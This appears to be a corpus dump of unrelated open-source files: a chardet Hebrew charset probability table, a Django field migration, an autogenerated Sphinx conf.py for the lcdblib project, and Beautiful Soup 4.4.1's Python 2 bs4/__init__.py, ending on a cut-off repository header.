3,3,3,3,3,3,2,3,3,3,2,2,3,3,3,2,1,2,3,2,3,2,2,2,2,1,2,1,1,1,2,2,
0,2,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,
1,0,1,0,0,0,0,0,2,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,2,3,3,2,3,1,2,2,2,2,3,2,3,1,1,2,2,1,2,2,1,1,0,2,2,2,2,
0,1,0,1,2,2,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,
3,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,2,0,
0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,0,1,0,1,1,0,1,1,0,0,0,1,1,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
3,2,2,1,2,2,2,2,2,2,2,1,2,2,1,2,2,1,1,1,1,1,1,1,1,2,1,1,0,3,3,3,
0,3,0,2,2,2,2,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
2,2,2,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,1,2,2,2,1,1,1,2,0,1,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2,2,2,2,0,2,2,0,0,0,0,0,0,
0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,1,0,2,1,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
0,3,1,1,2,2,2,2,2,1,2,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,0,1,1,1,1,0,
0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,1,1,1,1,2,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0,
0,0,2,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,0,0,
2,1,1,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,1,2,1,2,1,1,1,1,0,0,0,0,
0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,1,2,2,2,2,2,2,2,2,2,2,1,2,1,2,1,1,2,1,1,1,2,1,2,1,2,0,1,0,1,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,3,1,2,2,2,1,2,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,2,1,2,1,1,0,1,0,1,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,
0,2,0,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,
3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,1,1,1,1,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,2,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,0,0,0,0,1,1,0,0,
0,1,1,1,2,1,2,2,2,0,2,0,2,0,1,1,2,1,1,1,1,2,1,0,1,1,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,1,0,0,0,0,0,1,0,1,2,2,0,1,0,0,1,1,2,2,1,2,0,2,0,0,0,1,2,0,1,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,2,0,2,1,2,0,2,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,1,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,1,2,2,0,0,1,0,0,0,1,0,0,1,
1,1,2,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,2,1,
0,2,0,1,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,0,0,1,0,1,1,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,1,1,0,1,
2,0,1,0,1,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,1,2,1,1,2,0,1,0,0,0,1,1,0,1,
1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,0,0,2,1,1,2,0,2,0,0,0,1,1,0,1,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,2,2,1,2,1,1,0,1,0,0,0,1,1,0,1,
2,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,0,1,0,1,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,2,2,0,0,0,0,2,1,1,1,0,2,1,1,0,0,0,2,1,0,1,
1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,0,2,1,1,0,1,0,0,0,1,1,0,1,
2,2,1,1,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,2,1,1,0,1,0,0,1,1,0,1,2,1,0,2,0,0,0,1,1,0,1,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,
0,1,0,0,2,0,2,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,1,0,1,1,2,0,1,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1,
1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,2,1,1,1,1,1,0,1,0,0,0,0,1,0,1,
0,1,1,1,2,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,1,2,1,0,0,0,0,0,1,1,1,1,1,0,1,0,0,0,1,1,0,0,
)
Win1255HebrewModel = {
'charToOrderMap': win1255_CharToOrderMap,
'precedenceMatrix': HebrewLangModel,
'mTypicalPositiveRatio': 0.984004,
'keepEnglishLetter': False,
'charsetName': "windows-1255"
}
# flake8: noqa
|
barberscore/barberscore-api
|
refs/heads/master
|
project/apps/registration/migrations/0009_auto_20190909_0637.py
|
3
|
# Generated by Django 2.2.5 on 2019-09-09 13:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('registration', '0008_auto_20190909_0626'),
]
operations = [
migrations.AlterField(
model_name='assignment',
name='area',
field=models.CharField(blank=True, default='', help_text='\n Free-form field (based on district)', max_length=10),
),
migrations.AlterField(
model_name='entry',
name='area',
field=models.CharField(blank=True, default='', help_text='Free-form field (based on district)', max_length=255),
),
]
|
lcdb/lcdblib
|
refs/heads/master
|
docs/conf.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lcdblib documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import lcdblib
import guzzle_sphinx_theme
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'sphinx.ext.viewcode', 'sphinx.ext.napoleon',
'guzzle_sphinx_theme',
]
napolean_numpy_docstring = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lcdblib'
copyright = u"2016, lcdb"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = lcdblib.__version__
# The full version, including alpha/beta/rc tags.
release = lcdblib.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme_path = guzzle_sphinx_theme.html_theme_path()
html_theme = 'guzzle_sphinx_theme'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'lcdblibdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'lcdblib.tex',
u'lcdblib Documentation',
u'lcdb', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'lcdblib',
u'lcdblib Documentation',
[u'lcdb'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'lcdblib',
u'lcdblib Documentation',
u'lcdb',
'lcdblib',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
z1gm4/desarrollo_web_udp
|
refs/heads/dev
|
env/lib/python2.7/site-packages/bs4/__init__.py
|
38
|
"""Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides provides methods and Pythonic idioms that make it easy to
navigate, search, and modify the parse tree.
Beautiful Soup works with Python 2.6 and up. It works better if lxml
and/or html5lib is installed.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/bs4/doc/
"""
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.4.1"
__copyright__ = "Copyright (c) 2004-2015 Leonard Richardson"
__license__ = "MIT"
__all__ = ['BeautifulSoup']
import os
import re
import warnings
from .builder import builder_registry, ParserRejectedMarkup
from .dammit import UnicodeDammit
from .element import (
CData,
Comment,
DEFAULT_OUTPUT_ENCODING,
Declaration,
Doctype,
NavigableString,
PageElement,
ProcessingInstruction,
ResultSet,
SoupStrainer,
Tag,
)
# The very first thing we do is give a useful error if someone is
# running this code under Python 3 without converting it.
'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work.'<>'You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
class BeautifulSoup(Tag):
"""
This class defines the basic interface called by the tree builders.
These methods will be called by the parser:
reset()
feed(markup)
The tree builder may call these methods from its feed() implementation:
handle_starttag(name, attrs) # See note about return value
handle_endtag(name)
handle_data(data) # Appends to the current data node
endData(containerClass=NavigableString) # Ends the current data node
No matter how complicated the underlying parser is, you should be
able to build a tree using 'start tag' events, 'end tag' events,
'data' events, and "done with data" events.
If you encounter an empty-element tag (aka a self-closing tag,
like HTML's <br> tag), call handle_starttag and then
handle_endtag.
"""
ROOT_TAG_NAME = u'[document]'
# If the end-user gives no indication which tree builder they
# want, look for one with these features.
DEFAULT_BUILDER_FEATURES = ['html', 'fast']
ASCII_SPACES = '\x20\x0a\x09\x0c\x0d'
NO_PARSER_SPECIFIED_WARNING = "No parser was explicitly specified, so I'm using the best available %(markup_type)s parser for this system (\"%(parser)s\"). This usually isn't a problem, but if you run this code on another system, or in a different virtual environment, it may use a different parser and behave differently.\n\nTo get rid of this warning, change this:\n\n BeautifulSoup([your markup])\n\nto this:\n\n BeautifulSoup([your markup], \"%(parser)s\")\n"
def __init__(self, markup="", features=None, builder=None,
parse_only=None, from_encoding=None, exclude_encodings=None,
**kwargs):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser."""
if 'convertEntities' in kwargs:
warnings.warn(
"BS4 does not respect the convertEntities argument to the "
"BeautifulSoup constructor. Entities are always converted "
"to Unicode characters.")
if 'markupMassage' in kwargs:
del kwargs['markupMassage']
warnings.warn(
"BS4 does not respect the markupMassage argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for any necessary markup massage.")
if 'smartQuotesTo' in kwargs:
del kwargs['smartQuotesTo']
warnings.warn(
"BS4 does not respect the smartQuotesTo argument to the "
"BeautifulSoup constructor. Smart quotes are always converted "
"to Unicode characters.")
if 'selfClosingTags' in kwargs:
del kwargs['selfClosingTags']
warnings.warn(
"BS4 does not respect the selfClosingTags argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for understanding self-closing tags.")
if 'isHTML' in kwargs:
del kwargs['isHTML']
warnings.warn(
"BS4 does not respect the isHTML argument to the "
"BeautifulSoup constructor. Suggest you use "
"features='lxml' for HTML and features='lxml-xml' for "
"XML.")
def deprecated_argument(old_name, new_name):
if old_name in kwargs:
warnings.warn(
'The "%s" argument to the BeautifulSoup constructor '
'has been renamed to "%s."' % (old_name, new_name))
value = kwargs[old_name]
del kwargs[old_name]
return value
return None
parse_only = parse_only or deprecated_argument(
"parseOnlyThese", "parse_only")
from_encoding = from_encoding or deprecated_argument(
"fromEncoding", "from_encoding")
if len(kwargs) > 0:
arg = kwargs.keys().pop()
raise TypeError(
"__init__() got an unexpected keyword argument '%s'" % arg)
if builder is None:
original_features = features
if isinstance(features, basestring):
features = [features]
if features is None or len(features) == 0:
features = self.DEFAULT_BUILDER_FEATURES
builder_class = builder_registry.lookup(*features)
if builder_class is None:
raise FeatureNotFound(
"Couldn't find a tree builder with the features you "
"requested: %s. Do you need to install a parser library?"
% ",".join(features))
builder = builder_class()
if not (original_features == builder.NAME or
original_features in builder.ALTERNATE_NAMES):
if builder.is_xml:
markup_type = "XML"
else:
markup_type = "HTML"
warnings.warn(self.NO_PARSER_SPECIFIED_WARNING % dict(
parser=builder.NAME,
markup_type=markup_type))
self.builder = builder
self.is_xml = builder.is_xml
self.builder.soup = self
self.parse_only = parse_only
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
elif len(markup) <= 256:
# Print out warnings for a couple beginner problems
# involving passing non-markup to Beautiful Soup.
# Beautiful Soup will still parse the input as markup,
# just in case that's what the user really wants.
if (isinstance(markup, unicode)
and not os.path.supports_unicode_filenames):
possible_filename = markup.encode("utf8")
else:
possible_filename = markup
is_file = False
try:
is_file = os.path.exists(possible_filename)
except Exception, e:
# This is almost certainly a problem involving
# characters not valid in filenames on this
# system. Just let it go.
pass
if is_file:
if isinstance(markup, unicode):
markup = markup.encode("utf8")
warnings.warn(
'"%s" looks like a filename, not markup. You should probably open this file and pass the filehandle into Beautiful Soup.' % markup)
if markup[:5] == "http:" or markup[:6] == "https:":
# TODO: This is ugly but I couldn't get it to work in
# Python 3 otherwise.
if ((isinstance(markup, bytes) and not b' ' in markup)
or (isinstance(markup, unicode) and not u' ' in markup)):
if isinstance(markup, unicode):
markup = markup.encode("utf8")
warnings.warn(
'"%s" looks like a URL. Beautiful Soup is not an HTTP client. You should probably use an HTTP client to get the document behind the URL, and feed that document to Beautiful Soup.' % markup)
for (self.markup, self.original_encoding, self.declared_html_encoding,
self.contains_replacement_characters) in (
self.builder.prepare_markup(
markup, from_encoding, exclude_encodings=exclude_encodings)):
self.reset()
try:
self._feed()
break
except ParserRejectedMarkup:
pass
# Clear out the markup and remove the builder's circular
# reference to this object.
self.markup = None
self.builder.soup = None
def __copy__(self):
return type(self)(self.encode(), builder=self.builder)
def __getstate__(self):
# Frequently a tree builder can't be pickled.
d = dict(self.__dict__)
if 'builder' in d and not self.builder.picklable:
del d['builder']
return d
def _feed(self):
# Convert the document to Unicode.
self.builder.reset()
self.builder.feed(self.markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.current_data = []
self.currentTag = None
self.tagStack = []
self.preserve_whitespace_tag_stack = []
self.pushTag(self)
def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
"""Create a new tag associated with this soup."""
return Tag(None, self.builder, name, namespace, nsprefix, attrs)
def new_string(self, s, subclass=NavigableString):
"""Create a new NavigableString associated with this soup."""
return subclass(s)
def insert_before(self, successor):
raise NotImplementedError("BeautifulSoup objects don't support insert_before().")
def insert_after(self, successor):
raise NotImplementedError("BeautifulSoup objects don't support insert_after().")
def popTag(self):
tag = self.tagStack.pop()
if self.preserve_whitespace_tag_stack and tag == self.preserve_whitespace_tag_stack[-1]:
self.preserve_whitespace_tag_stack.pop()
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
if self.currentTag:
self.currentTag.contents.append(tag)
self.tagStack.append(tag)
self.currentTag = self.tagStack[-1]
if tag.name in self.builder.preserve_whitespace_tags:
self.preserve_whitespace_tag_stack.append(tag)
def endData(self, containerClass=NavigableString):
if self.current_data:
current_data = u''.join(self.current_data)
# If whitespace is not preserved, and this string contains
# nothing but ASCII spaces, replace it with a single space
# or newline.
if not self.preserve_whitespace_tag_stack:
strippable = True
for i in current_data:
if i not in self.ASCII_SPACES:
strippable = False
break
if strippable:
if '\n' in current_data:
current_data = '\n'
else:
current_data = ' '
# Reset the data collector.
self.current_data = []
# Should we add this string to the tree at all?
if self.parse_only and len(self.tagStack) <= 1 and \
(not self.parse_only.text or \
not self.parse_only.search(current_data)):
return
o = containerClass(current_data)
self.object_was_parsed(o)
def object_was_parsed(self, o, parent=None, most_recent_element=None):
"""Add an object to the parse tree."""
parent = parent or self.currentTag
previous_element = most_recent_element or self._most_recent_element
next_element = previous_sibling = next_sibling = None
if isinstance(o, Tag):
next_element = o.next_element
next_sibling = o.next_sibling
previous_sibling = o.previous_sibling
if not previous_element:
previous_element = o.previous_element
o.setup(parent, previous_element, next_element, previous_sibling, next_sibling)
self._most_recent_element = o
parent.contents.append(o)
if parent.next_sibling:
# This node is being inserted into an element that has
# already been parsed. Deal with any dangling references.
index = parent.contents.index(o)
if index == 0:
previous_element = parent
previous_sibling = None
else:
previous_element = previous_sibling = parent.contents[index-1]
if index == len(parent.contents)-1:
next_element = parent.next_sibling
next_sibling = None
else:
next_element = next_sibling = parent.contents[index+1]
o.previous_element = previous_element
if previous_element:
previous_element.next_element = o
o.next_element = next_element
if next_element:
next_element.previous_element = o
o.next_sibling = next_sibling
if next_sibling:
next_sibling.previous_sibling = o
o.previous_sibling = previous_sibling
if previous_sibling:
previous_sibling.next_sibling = o
def _popToTag(self, name, nsprefix=None, inclusivePop=True):
"""Pops the tag stack up to and including the most recent
instance of the given tag. If inclusivePop is false, pops the tag
stack up to but *not* including the most recent instqance of
the given tag."""
#print "Popping to %s" % name
if name == self.ROOT_TAG_NAME:
# The BeautifulSoup object itself can never be popped.
return
most_recently_popped = None
stack_size = len(self.tagStack)
for i in range(stack_size - 1, 0, -1):
t = self.tagStack[i]
if (name == t.name and nsprefix == t.prefix):
if inclusivePop:
most_recently_popped = self.popTag()
break
most_recently_popped = self.popTag()
return most_recently_popped
def handle_starttag(self, name, namespace, nsprefix, attrs):
"""Push a start tag on to the stack.
If this method returns None, the tag was rejected by the
SoupStrainer. You should proceed as if the tag had not occured
in the document. For instance, if this was a self-closing tag,
don't call handle_endtag.
"""
# print "Start tag %s: %s" % (name, attrs)
self.endData()
if (self.parse_only and len(self.tagStack) <= 1
and (self.parse_only.text
or not self.parse_only.search_tag(name, attrs))):
return None
tag = Tag(self, self.builder, name, namespace, nsprefix, attrs,
self.currentTag, self._most_recent_element)
if tag is None:
return tag
if self._most_recent_element:
self._most_recent_element.next_element = tag
self._most_recent_element = tag
self.pushTag(tag)
return tag
def handle_endtag(self, name, nsprefix=None):
#print "End tag: " + name
self.endData()
self._popToTag(name, nsprefix)
def handle_data(self, data):
self.current_data.append(data)
def decode(self, pretty_print=False,
eventual_encoding=DEFAULT_OUTPUT_ENCODING,
formatter="minimal"):
"""Returns a string or Unicode representation of this document.
To get Unicode, pass None for encoding."""
if self.is_xml:
# Print the XML declaration
encoding_part = ''
if eventual_encoding != None:
encoding_part = ' encoding="%s"' % eventual_encoding
prefix = u'<?xml version="1.0"%s?>\n' % encoding_part
else:
prefix = u''
if not pretty_print:
indent_level = None
else:
indent_level = 0
return prefix + super(BeautifulSoup, self).decode(
indent_level, eventual_encoding, formatter)
# Alias to make it easier to type import: 'from bs4 import _soup'
_s = BeautifulSoup
_soup = BeautifulSoup
class BeautifulStoneSoup(BeautifulSoup):
"""Deprecated interface to an XML parser."""
def __init__(self, *args, **kwargs):
kwargs['features'] = 'xml'
warnings.warn(
'The BeautifulStoneSoup class is deprecated. Instead of using '
'it, pass features="xml" into the BeautifulSoup constructor.')
super(BeautifulStoneSoup, self).__init__(*args, **kwargs)
class StopParsing(Exception):
pass
class FeatureNotFound(ValueError):
pass
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin)
print soup.prettify()
|
laenderoliveira/exerclivropy
|
